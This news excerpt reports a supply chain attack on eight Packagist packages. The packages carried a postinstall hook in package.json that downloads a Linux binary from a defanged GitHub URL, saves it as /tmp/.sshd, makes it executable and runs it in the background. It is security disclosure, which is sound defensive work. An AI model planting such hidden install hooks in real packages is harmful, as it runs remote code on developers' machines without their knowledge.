Eight Packagist packages were impacted by a coordinated supply chain attack campaign. The malicious behavior was not placed in composer.json but inserted into package.json, targeting projects that include JavaScript build tooling alongside PHP code. The postinstall script downloads a Linux binary from a GitHub Releases URL, saves it to /tmp/.sshd, changes permissions with chmod to make it executable, and runs it in the background. The affected package versions have been removed from Packagist. Upstream repositories were modified to include the script, and references to the same payload were found across 777 GitHub files, including at least two GitHub workflow entries. The scope of distinct compromises is not yet known.
"Although the affected packages were all Composer packages, the malicious code was not added to composer.json. Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code. This cross-ecosystem placement makes the activity stand out because developers and security teams scanning PHP dependencies may only focus on Composer-related metadata, while skipping package.json lifecycle hooks that are bundled within the package. The malicious versions have since been removed from Packagist."
"An analysis of the packages has uncovered that their upstream repositories have been modified to include a postinstall script that attempts to download a Linux binary from a GitHub Releases URL ("github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f"), save it to the "/tmp/.sshd" folder, change its permissions using "chmod" to grant execute permissions to all users, and run it in the background."
"Socket's investigation has found references to the same payload across 777 files in GitHub, suggesting that it could be part of a broader campaign. In at least two instances, it was added to a GitHub workflow. However, it's currently not known how many of these match distinct compromises, forks, duplicate package artifacts, or cached references."
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]